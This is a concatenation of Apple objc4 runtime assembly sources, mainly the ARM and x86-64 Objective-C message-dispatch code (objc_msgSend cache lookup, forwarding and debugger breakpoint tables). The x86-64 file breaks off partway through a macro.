// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
MESSENGER_START
nop
MESSENGER_END_SLOW
jne __objc_msgForward_stret
jmp __objc_msgForward
END_ENTRY _objc_msgForward_impcache
ENTRY __objc_msgForward
// Non-struct return version
call 1f
1: popl %edx
movl L_forward_handler-1b(%edx), %edx
jmp *(%edx)
END_ENTRY __objc_msgForward
ENTRY __objc_msgForward_stret
// Struct return version
call 1f
1: popl %edx
movl L_forward_stret_handler-1b(%edx), %edx
jmp *(%edx)
END_ENTRY __objc_msgForward_stret
ENTRY _objc_msgSend_debug
jmp _objc_msgSend
END_ENTRY _objc_msgSend_debug
ENTRY _objc_msgSendSuper2_debug
jmp _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_debug
ENTRY _objc_msgSend_stret_debug
jmp _objc_msgSend_stret
END_ENTRY _objc_msgSend_stret_debug
ENTRY _objc_msgSendSuper2_stret_debug
jmp _objc_msgSendSuper2_stret
END_ENTRY _objc_msgSendSuper2_stret_debug
ENTRY _objc_msgSend_fpret_debug
jmp _objc_msgSend_fpret
END_ENTRY _objc_msgSend_fpret_debug
ENTRY _objc_msgSend_noarg
jmp _objc_msgSend
END_ENTRY _objc_msgSend_noarg
ENTRY _method_invoke
movl selector(%esp), %ecx
movl method_name(%ecx), %edx
movl method_imp(%ecx), %eax
movl %edx, selector(%esp)
jmp *%eax
END_ENTRY _method_invoke
ENTRY _method_invoke_stret
movl selector_stret(%esp), %ecx
movl method_name(%ecx), %edx
movl method_imp(%ecx), %eax
movl %edx, selector_stret(%esp)
jmp *%eax
END_ENTRY _method_invoke_stret
#if DEBUG
STATIC_ENTRY __objc_ignored_method
movl self(%esp), %eax
ret
END_ENTRY __objc_ignored_method
#endif
.section __DATA,__objc_msg_break
.long 0
.long 0
#endif
|
opensource-apple/objc4 | 19,597 | runtime/Messengers.subproj/objc-msg-arm.s | /*
* @APPLE_LICENSE_HEADER_START@
*
* Copyright (c) 1999-2007 Apple Computer, Inc. All Rights Reserved.
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
/********************************************************************
*
* objc-msg-arm.s - ARM code to support objc messaging
*
********************************************************************/
#ifdef __arm__
#include <arm/arch.h>
#ifndef _ARM_ARCH_7
# error requires armv7
#endif
// Set FP=1 on architectures that pass parameters in floating-point registers
#if __ARM_ARCH_7K__
# define FP 1
#else
# define FP 0
#endif
#if FP
# if !__ARM_NEON__
# error sorry
# endif
# define FP_RETURN_ZERO \
vmov.i32 q0, #0 ; \
vmov.i32 q1, #0 ; \
vmov.i32 q2, #0 ; \
vmov.i32 q3, #0
# define FP_SAVE \
vpush {q0-q3}
# define FP_RESTORE \
vpop {q0-q3}
#else
# define FP_RETURN_ZERO
# define FP_SAVE
# define FP_RESTORE
#endif
.syntax unified
#define MI_EXTERN(var) \
.non_lazy_symbol_pointer ;\
L ## var ## $$non_lazy_ptr: ;\
.indirect_symbol var ;\
.long 0
#define MI_GET_EXTERN(reg,var) \
movw reg, :lower16:(L##var##$$non_lazy_ptr-4f-4) ;\
movt reg, :upper16:(L##var##$$non_lazy_ptr-4f-4) ;\
4: add reg, pc ;\
ldr reg, [reg]
#define MI_CALL_EXTERNAL(var) \
MI_GET_EXTERN(r12,var) ;\
blx r12
#define MI_GET_ADDRESS(reg,var) \
movw reg, :lower16:(var-4f-4) ;\
movt reg, :upper16:(var-4f-4) ;\
4: add reg, pc ;\
MI_EXTERN(__class_lookupMethodAndLoadCache3)
MI_EXTERN(___objc_error)
.data
// _objc_entryPoints and _objc_exitPoints are used by method dispatch
// caching code to figure out whether any threads are actively
// in the cache for dispatching. The labels surround the asm code
// that do cache lookups. The tables are zero-terminated.
.align 2
.private_extern _objc_entryPoints
_objc_entryPoints:
.long _cache_getImp
.long _objc_msgSend
.long _objc_msgSend_stret
.long _objc_msgSendSuper
.long _objc_msgSendSuper_stret
.long _objc_msgSendSuper2
.long _objc_msgSendSuper2_stret
.long 0
.private_extern _objc_exitPoints
_objc_exitPoints:
.long LGetImpExit
.long LMsgSendExit
.long LMsgSendStretExit
.long LMsgSendSuperExit
.long LMsgSendSuperStretExit
.long LMsgSendSuper2Exit
.long LMsgSendSuper2StretExit
.long 0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.long 4b
.long ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.long 4b
.long FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.long 4b
.long SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.long 4b
.long NIL_EXIT
.text
.endmacro
/********************************************************************
* Names for relative labels
* DO NOT USE THESE LABELS ELSEWHERE
* Reserved labels: 8: 9:
********************************************************************/
#define LCacheMiss 8
#define LCacheMiss_f 8f
#define LCacheMiss_b 8b
#define LNilReceiver 9
#define LNilReceiver_f 9f
#define LNilReceiver_b 9b
/********************************************************************
* Macro parameters
********************************************************************/
#define NORMAL 0
#define FPRET 1
#define FP2RET 2
#define GETIMP 3
#define STRET 4
#define SUPER 5
#define SUPER2 6
#define SUPER_STRET 7
#define SUPER2_STRET 8
/********************************************************************
*
* Structure definitions.
*
********************************************************************/
/* objc_super parameter to sendSuper */
#define RECEIVER 0
#define CLASS 4
/* Selected field offsets in class structure */
#define ISA 0
#define SUPERCLASS 4
#define CACHE 8
#define CACHE_MASK 12
/* Selected field offsets in method structure */
#define METHOD_NAME 0
#define METHOD_TYPES 4
#define METHOD_IMP 8
//////////////////////////////////////////////////////////////////////
//
// ENTRY functionName
//
// Assembly directives to begin an exported function.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro ENTRY /* name */
.text
.thumb
.align 5
.globl _$0
.thumb_func
_$0:
.endmacro
.macro STATIC_ENTRY /*name*/
.text
.thumb
.align 5
.private_extern _$0
.thumb_func
_$0:
.endmacro
//////////////////////////////////////////////////////////////////////
//
// END_ENTRY functionName
//
// Assembly directives to end an exported function. Just a placeholder,
// a close-parenthesis for ENTRY, until it is needed for something.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro END_ENTRY /* name */
.endmacro
/////////////////////////////////////////////////////////////////////
//
// CacheLookup return-type
//
// Locate the implementation for a selector in a class's method cache.
//
// Takes:
// $0 = NORMAL, STRET, SUPER, SUPER_STRET, SUPER2, SUPER2_STRET, GETIMP
// r0 or r1 (STRET) = receiver
// r1 or r2 (STRET) = selector
// r9 = class to search in
//
// On exit: r9 and r12 clobbered
// (found) calls or returns IMP, eq/ne/r9 set for forwarding
// (not found) jumps to LCacheMiss
//
/////////////////////////////////////////////////////////////////////
.macro CacheHit
.if $0 == GETIMP
ldr r0, [r9, #4] // r0 = bucket->imp
MI_GET_ADDRESS(r1, __objc_msgSend_uncached_impcache)
teq r0, r1
it eq
moveq r0, #0 // don't return msgSend_uncached
bx lr // return imp
.elseif $0 == NORMAL
ldr r12, [r9, #4] // r12 = bucket->imp
// eq already set for nonstret forward
MESSENGER_END_FAST
bx r12 // call imp
.elseif $0 == STRET
ldr r12, [r9, #4] // r12 = bucket->imp
movs r9, #1 // r9=1, Z=0 for stret forwarding
MESSENGER_END_FAST
bx r12 // call imp
.elseif $0 == SUPER
ldr r12, [r9, #4] // r12 = bucket->imp
ldr r9, [r0, #CLASS] // r9 = class to search for forwarding
ldr r0, [r0, #RECEIVER] // fetch real receiver
tst r12, r12 // set ne for forwarding (r12!=0)
MESSENGER_END_FAST
bx r12 // call imp
.elseif $0 == SUPER2
ldr r12, [r9, #4] // r12 = bucket->imp
ldr r9, [r0, #CLASS]
ldr r9, [r9, #SUPERCLASS] // r9 = class to search for forwarding
ldr r0, [r0, #RECEIVER] // fetch real receiver
tst r12, r12 // set ne for forwarding (r12!=0)
MESSENGER_END_FAST
bx r12 // call imp
.elseif $0 == SUPER_STRET
ldr r12, [r9, #4] // r12 = bucket->imp
ldr r9, [r1, #CLASS] // r9 = class to search for forwarding
orr r9, r9, #1 // r9 = class|1 for super_stret forward
ldr r1, [r1, #RECEIVER] // fetch real receiver
tst r12, r12 // set ne for forwarding (r12!=0)
MESSENGER_END_FAST
bx r12 // call imp
.elseif $0 == SUPER2_STRET
ldr r12, [r9, #4] // r12 = bucket->imp
ldr r9, [r1, #CLASS] // r9 = class to search for forwarding
ldr r9, [r9, #SUPERCLASS] // r9 = class to search for forwarding
orr r9, r9, #1 // r9 = class|1 for super_stret forward
ldr r1, [r1, #RECEIVER] // fetch real receiver
tst r12, r12 // set ne for forwarding (r12!=0)
MESSENGER_END_FAST
bx r12 // call imp
.else
.abort oops
.endif
.endmacro
.macro CacheLookup
ldrh r12, [r9, #CACHE_MASK] // r12 = mask
ldr r9, [r9, #CACHE] // r9 = buckets
.if $0 == STRET || $0 == SUPER_STRET
and r12, r12, r2 // r12 = index = SEL & mask
.else
and r12, r12, r1 // r12 = index = SEL & mask
.endif
add r9, r9, r12, LSL #3 // r9 = bucket = buckets+index*8
ldr r12, [r9] // r12 = bucket->sel
2:
.if $0 == STRET || $0 == SUPER_STRET
teq r12, r2
.else
teq r12, r1
.endif
bne 1f
CacheHit $0
1:
cmp r12, #1
blo LCacheMiss_f // if (bucket->sel == 0) cache miss
it eq // if (bucket->sel == 1) cache wrap
ldreq r9, [r9, #4] // bucket->imp is before first bucket
ldr r12, [r9, #8]! // r12 = (++bucket)->sel
b 2b
.endmacro
/********************************************************************
* IMP cache_getImp(Class cls, SEL sel)
*
* On entry: r0 = class whose cache is to be searched
* r1 = selector to search for
*
* If found, returns method implementation.
* If not found, returns NULL.
********************************************************************/
STATIC_ENTRY cache_getImp
mov r9, r0
CacheLookup GETIMP // returns IMP on success
LCacheMiss:
mov r0, #0 // return nil if cache miss
bx lr
LGetImpExit:
END_ENTRY cache_getImp
/********************************************************************
*
* id objc_msgSend(id self, SEL _cmd,...);
*
********************************************************************/
ENTRY objc_msgSend
MESSENGER_START
cbz r0, LNilReceiver_f
ldr r9, [r0] // r9 = self->isa
CacheLookup NORMAL
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r0, #ISA] // class = receiver->isa
b __objc_msgSend_uncached
LNilReceiver:
// r0 is already zero
mov r1, #0
mov r2, #0
mov r3, #0
FP_RETURN_ZERO
MESSENGER_END_NIL
bx lr
LMsgSendExit:
END_ENTRY objc_msgSend
/********************************************************************
* id objc_msgSend_noarg(id self, SEL op)
*
* On entry: r0 is the message receiver,
* r1 is the selector
********************************************************************/
ENTRY objc_msgSend_noarg
b _objc_msgSend
END_ENTRY objc_msgSend_noarg
/********************************************************************
* void objc_msgSend_stret(void *st_addr, id self, SEL op, ...);
*
* objc_msgSend_stret is the struct-return form of msgSend.
* The ABI calls for r0 to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: r0 is the address where the structure is returned,
* r1 is the message receiver,
* r2 is the selector
********************************************************************/
ENTRY objc_msgSend_stret
MESSENGER_START
cbz r1, LNilReceiver_f
ldr r9, [r1] // r9 = self->isa
CacheLookup STRET
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r1] // r9 = self->isa
b __objc_msgSend_stret_uncached
LNilReceiver:
MESSENGER_END_NIL
bx lr
LMsgSendStretExit:
END_ENTRY objc_msgSend_stret
/********************************************************************
* id objc_msgSendSuper(struct objc_super *super, SEL op, ...)
*
* struct objc_super {
* id receiver;
* Class cls; // the class to search
* }
********************************************************************/
ENTRY objc_msgSendSuper
MESSENGER_START
ldr r9, [r0, #CLASS] // r9 = struct super->class
CacheLookup SUPER
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r0, #CLASS] // r9 = struct super->class
ldr r0, [r0, #RECEIVER] // load real receiver
b __objc_msgSend_uncached
LMsgSendSuperExit:
END_ENTRY objc_msgSendSuper
/********************************************************************
* id objc_msgSendSuper2(struct objc_super *super, SEL op, ...)
*
* struct objc_super {
* id receiver;
* Class cls; // SUBCLASS of the class to search
* }
********************************************************************/
ENTRY objc_msgSendSuper2
MESSENGER_START
ldr r9, [r0, #CLASS] // class = struct super->class
ldr r9, [r9, #SUPERCLASS] // class = class->superclass
CacheLookup SUPER2
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r0, #CLASS] // class = struct super->class
ldr r9, [r9, #SUPERCLASS] // class = class->superclass
ldr r0, [r0, #RECEIVER] // load real receiver
b __objc_msgSend_uncached
LMsgSendSuper2Exit:
END_ENTRY objc_msgSendSuper2
/********************************************************************
* void objc_msgSendSuper_stret(void *st_addr, objc_super *self, SEL op, ...);
*
* objc_msgSendSuper_stret is the struct-return form of msgSendSuper.
* The ABI calls for r0 to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: r0 is the address where the structure is returned,
* r1 is the address of the objc_super structure,
* r2 is the selector
********************************************************************/
ENTRY objc_msgSendSuper_stret
MESSENGER_START
ldr r9, [r1, #CLASS] // r9 = struct super->class
CacheLookup SUPER_STRET
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r1, #CLASS] // r9 = struct super->class
ldr r1, [r1, #RECEIVER] // load real receiver
b __objc_msgSend_stret_uncached
LMsgSendSuperStretExit:
END_ENTRY objc_msgSendSuper_stret
/********************************************************************
* id objc_msgSendSuper2_stret
********************************************************************/
ENTRY objc_msgSendSuper2_stret
MESSENGER_START
ldr r9, [r1, #CLASS] // class = struct super->class
ldr r9, [r9, #SUPERCLASS] // class = class->superclass
CacheLookup SUPER2_STRET
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r1, #CLASS] // class = struct super->class
ldr r9, [r9, #SUPERCLASS] // class = class->superclass
ldr r1, [r1, #RECEIVER] // load real receiver
b __objc_msgSend_stret_uncached
LMsgSendSuper2StretExit:
END_ENTRY objc_msgSendSuper2_stret
/********************************************************************
*
* _objc_msgSend_uncached_impcache
* Used to erase method cache entries in-place by
* bouncing them to the uncached lookup.
*
* _objc_msgSend_uncached
* _objc_msgSend_stret_uncached
* The uncached lookup.
*
********************************************************************/
STATIC_ENTRY _objc_msgSend_uncached_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band Z is 0 (EQ) for normal, 1 (NE) for stret and/or super
// Out-of-band r9 is 1 for stret, cls for super, cls|1 for super_stret
// Note objc_msgForward_impcache uses the same parameters
MESSENGER_START
nop
MESSENGER_END_SLOW
ite eq
ldreq r9, [r0] // normal: r9 = class = self->isa
tstne r9, #1 // low bit clear?
beq __objc_msgSend_uncached // super: r9 is already the class
// stret or super_stret
eors r9, r9, #1 // clear low bit
it eq // r9 now zero?
ldreq r9, [r1] // stret: r9 = class = self->isa
// super_stret: r9 is already the class
b __objc_msgSend_stret_uncached
END_ENTRY _objc_msgSend_uncached_impcache
STATIC_ENTRY _objc_msgSend_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r9 is the class to search
stmfd sp!, {r0-r3,r7,lr}
add r7, sp, #16
sub sp, #8 // align stack
FP_SAVE
// receiver already in r0
// selector already in r1
mov r2, r9 // class to search
MI_CALL_EXTERNAL(__class_lookupMethodAndLoadCache3)
mov r12, r0 // r12 = IMP
movs r9, #0 // r9=0, Z=1 for nonstret forwarding
FP_RESTORE
add sp, #8 // align stack
ldmfd sp!, {r0-r3,r7,lr}
bx r12
END_ENTRY _objc_msgSend_uncached
STATIC_ENTRY _objc_msgSend_stret_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r9 is the class to search
stmfd sp!, {r0-r3,r7,lr}
add r7, sp, #16
sub sp, #8 // align stack
FP_SAVE
mov r0, r1 // receiver
mov r1, r2 // selector
mov r2, r9 // class to search
MI_CALL_EXTERNAL(__class_lookupMethodAndLoadCache3)
mov r12, r0 // r12 = IMP
movs r9, #1 // r9=1, Z=0 for stret forwarding
FP_RESTORE
add sp, #8 // align stack
ldmfd sp!, {r0-r3,r7,lr}
bx r12
END_ENTRY _objc_msgSend_stret_uncached
/********************************************************************
*
* id _objc_msgForward(id self, SEL _cmd,...);
*
* _objc_msgForward and _objc_msgForward_stret are the externally-callable
* functions returned by things like method_getImplementation().
* _objc_msgForward_impcache is the function pointer actually stored in
* method caches.
*
********************************************************************/
MI_EXTERN(__objc_forward_handler)
MI_EXTERN(__objc_forward_stret_handler)
STATIC_ENTRY _objc_msgForward_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band Z is 0 (EQ) for normal, 1 (NE) for stret and/or super
// Out-of-band r9 is 1 for stret, cls for super, cls|1 for super_stret
// Note _objc_msgSend_uncached_impcache uses the same parameters
MESSENGER_START
nop
MESSENGER_END_SLOW
it ne
tstne r9, #1
beq __objc_msgForward
b __objc_msgForward_stret
END_ENTRY _objc_msgForward_impcache
ENTRY _objc_msgForward
// Non-stret version
MI_GET_EXTERN(r12, __objc_forward_handler)
ldr r12, [r12]
bx r12
END_ENTRY _objc_msgForward
ENTRY _objc_msgForward_stret
// Struct-return version
MI_GET_EXTERN(r12, __objc_forward_stret_handler)
ldr r12, [r12]
bx r12
END_ENTRY _objc_msgForward_stret
ENTRY objc_msgSend_debug
b _objc_msgSend
END_ENTRY objc_msgSend_debug
ENTRY objc_msgSendSuper2_debug
b _objc_msgSendSuper2
END_ENTRY objc_msgSendSuper2_debug
ENTRY objc_msgSend_stret_debug
b _objc_msgSend_stret
END_ENTRY objc_msgSend_stret_debug
ENTRY objc_msgSendSuper2_stret_debug
b _objc_msgSendSuper2_stret
END_ENTRY objc_msgSendSuper2_stret_debug
ENTRY method_invoke
// r1 is method triplet instead of SEL
ldr r12, [r1, #METHOD_IMP]
ldr r1, [r1, #METHOD_NAME]
bx r12
END_ENTRY method_invoke
ENTRY method_invoke_stret
// r2 is method triplet instead of SEL
ldr r12, [r2, #METHOD_IMP]
ldr r2, [r2, #METHOD_NAME]
bx r12
END_ENTRY method_invoke_stret
STATIC_ENTRY _objc_ignored_method
// self is already in a0
bx lr
END_ENTRY _objc_ignored_method
.section __DATA,__objc_msg_break
.long 0
.long 0
#endif
|
opensource-apple/objc4 | 27,634 | runtime/Messengers.subproj/objc-msg-x86_64.s | /*
* Copyright (c) 1999-2007 Apple Inc. All Rights Reserved.
*
* @APPLE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
#include <TargetConditionals.h>
#if __x86_64__ && !TARGET_IPHONE_SIMULATOR
/********************************************************************
********************************************************************
**
** objc-msg-x86_64.s - x86-64 code to support objc messaging.
**
********************************************************************
********************************************************************/
/********************************************************************
* Data used by the ObjC runtime.
*
********************************************************************/
.data
// _objc_entryPoints and _objc_exitPoints are used by objc
// to get the critical regions for which method caches
// cannot be garbage collected.
.align 4
.private_extern _objc_entryPoints
_objc_entryPoints:
.quad _cache_getImp
.quad _objc_msgSend
.quad _objc_msgSend_fpret
.quad _objc_msgSend_fp2ret
.quad _objc_msgSend_stret
.quad _objc_msgSendSuper
.quad _objc_msgSendSuper_stret
.quad _objc_msgSendSuper2
.quad _objc_msgSendSuper2_stret
.quad 0
.private_extern _objc_exitPoints
_objc_exitPoints:
.quad LExit_cache_getImp
.quad LExit_objc_msgSend
.quad LExit_objc_msgSend_fpret
.quad LExit_objc_msgSend_fp2ret
.quad LExit_objc_msgSend_stret
.quad LExit_objc_msgSendSuper
.quad LExit_objc_msgSendSuper_stret
.quad LExit_objc_msgSendSuper2
.quad LExit_objc_msgSendSuper2_stret
.quad 0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad NIL_EXIT
.text
.endmacro
/********************************************************************
* Recommended multi-byte NOP instructions
* (Intel 64 and IA-32 Architectures Software Developer's Manual Volume 2B)
********************************************************************/
#define nop1 .byte 0x90
#define nop2 .byte 0x66,0x90
#define nop3 .byte 0x0F,0x1F,0x00
#define nop4 .byte 0x0F,0x1F,0x40,0x00
#define nop5 .byte 0x0F,0x1F,0x44,0x00,0x00
#define nop6 .byte 0x66,0x0F,0x1F,0x44,0x00,0x00
#define nop7 .byte 0x0F,0x1F,0x80,0x00,0x00,0x00,0x00
#define nop8 .byte 0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00
#define nop9 .byte 0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00
/********************************************************************
* Harmless branch prefix hint for instruction alignment
********************************************************************/
#define PN .byte 0x2e
/********************************************************************
* Names for parameter registers.
********************************************************************/
#define a1 rdi
#define a1d edi
#define a1b dil
#define a2 rsi
#define a2d esi
#define a2b sil
#define a3 rdx
#define a3d edx
#define a4 rcx
#define a4d ecx
#define a5 r8
#define a5d r8d
#define a6 r9
#define a6d r9d
/********************************************************************
* Names for relative labels
* DO NOT USE THESE LABELS ELSEWHERE
* Reserved labels: 6: 7: 8: 9:
********************************************************************/
#define LCacheMiss 6
#define LCacheMiss_f 6f
#define LCacheMiss_b 6b
#define LNilTestSlow 7
#define LNilTestSlow_f 7f
#define LNilTestSlow_b 7b
#define LGetIsaDone 8
#define LGetIsaDone_f 8f
#define LGetIsaDone_b 8b
#define LGetIsaSlow 9
#define LGetIsaSlow_f 9f
#define LGetIsaSlow_b 9b
/********************************************************************
* Macro parameters
********************************************************************/
#define NORMAL 0
#define FPRET 1
#define FP2RET 2
#define GETIMP 3
#define STRET 4
#define SUPER 5
#define SUPER_STRET 6
#define SUPER2 7
#define SUPER2_STRET 8
/********************************************************************
*
* Structure definitions.
*
********************************************************************/
// objc_super parameter to sendSuper
#define receiver 0
#define class 8
// Selected field offsets in class structure
// #define isa 0 USE GetIsa INSTEAD
// Method descriptor
#define method_name 0
#define method_imp 16
// typedef struct {
// uint128_t floatingPointArgs[8]; // xmm0..xmm7
// long linkageArea[4]; // r10, rax, ebp, ret
// long registerArgs[6]; // a1..a6
// long stackArgs[0]; // variable-size
// } *marg_list;
#define FP_AREA 0
#define LINK_AREA (FP_AREA+8*16)
#define REG_AREA (LINK_AREA+4*8)
#define STACK_AREA (REG_AREA+6*8)
//////////////////////////////////////////////////////////////////////
//
// ENTRY functionName
//
// Assembly directives to begin an exported function.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro ENTRY
.text
.globl $0
.align 6, 0x90
$0:
.cfi_startproc
.endmacro
.macro STATIC_ENTRY
.text
.private_extern $0
.align 2, 0x90
$0:
.cfi_startproc
.endmacro
//////////////////////////////////////////////////////////////////////
//
// END_ENTRY functionName
//
// Assembly directives to end an exported function. Just a placeholder,
// a close-parenthesis for ENTRY, until it is needed for something.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro END_ENTRY
.cfi_endproc
LExit$0:
.endmacro
/////////////////////////////////////////////////////////////////////
//
// SaveRegisters
//
// Pushes a stack frame and saves all registers that might contain
// parameter values.
//
// On entry:
// stack = ret
//
// On exit:
// %rsp is 16-byte aligned
//
/////////////////////////////////////////////////////////////////////
.macro SaveRegisters
push %rbp
.cfi_def_cfa_offset 16
.cfi_offset rbp, -16
mov %rsp, %rbp
.cfi_def_cfa_register rbp
sub $$0x80+8, %rsp // +8 for alignment
movdqa %xmm0, -0x80(%rbp)
push %rax // might be xmm parameter count
movdqa %xmm1, -0x70(%rbp)
push %a1
movdqa %xmm2, -0x60(%rbp)
push %a2
movdqa %xmm3, -0x50(%rbp)
push %a3
movdqa %xmm4, -0x40(%rbp)
push %a4
movdqa %xmm5, -0x30(%rbp)
push %a5
movdqa %xmm6, -0x20(%rbp)
push %a6
movdqa %xmm7, -0x10(%rbp)
.endmacro
/////////////////////////////////////////////////////////////////////
//
// RestoreRegisters
//
// Pops a stack frame pushed by SaveRegisters
//
// On entry:
// %rbp unchanged since SaveRegisters
//
// On exit:
// stack = ret
//
/////////////////////////////////////////////////////////////////////
.macro RestoreRegisters
movdqa -0x80(%rbp), %xmm0
pop %a6
movdqa -0x70(%rbp), %xmm1
pop %a5
movdqa -0x60(%rbp), %xmm2
pop %a4
movdqa -0x50(%rbp), %xmm3
pop %a3
movdqa -0x40(%rbp), %xmm4
pop %a2
movdqa -0x30(%rbp), %xmm5
pop %a1
movdqa -0x20(%rbp), %xmm6
pop %rax
movdqa -0x10(%rbp), %xmm7
leave
.cfi_def_cfa rsp, 8
.cfi_same_value rbp
.endmacro
/////////////////////////////////////////////////////////////////////
//
// CacheLookup return-type, caller
//
// Locate the implementation for a class in a selector's method cache.
//
// Takes:
// $0 = NORMAL, FPRET, FP2RET, STRET, SUPER, SUPER_STRET, SUPER2, SUPER2_STRET, GETIMP
// a2 or a3 (STRET) = selector a.k.a. cache
// r11 = class to search
//
// On exit: r10 clobbered
// (found) calls or returns IMP, eq/ne/r11 set for forwarding
// (not found) jumps to LCacheMiss, class still in r11
//
/////////////////////////////////////////////////////////////////////
.macro CacheHit
// CacheHit must always be preceded by a not-taken `jne` instruction
// in order to set the correct flags for _objc_msgForward_impcache.
// r10 = found bucket
.if $0 == GETIMP
movq 8(%r10), %rax // return imp
leaq __objc_msgSend_uncached_impcache(%rip), %r11
cmpq %rax, %r11
jne 4f
xorl %eax, %eax // don't return msgSend_uncached
4: ret
.elseif $0 == NORMAL || $0 == FPRET || $0 == FP2RET
// eq already set for forwarding by `jne`
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER
movq receiver(%a1), %a1 // load real receiver
cmp %r10, %r10 // set eq for non-stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER2
movq receiver(%a1), %a1 // load real receiver
cmp %r10, %r10 // set eq for non-stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == STRET
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER_STRET
movq receiver(%a2), %a2 // load real receiver
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER2_STRET
movq receiver(%a2), %a2 // load real receiver
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.else
.abort oops
.endif
.endmacro
.macro CacheLookup
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
movq %a2, %r10 // r10 = _cmd
.else
movq %a3, %r10 // r10 = _cmd
.endif
andl 24(%r11), %r10d // r10 = _cmd & class->cache.mask
shlq $$4, %r10 // r10 = offset = (_cmd & mask)<<4
addq 16(%r11), %r10 // r10 = class->cache.buckets + offset
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
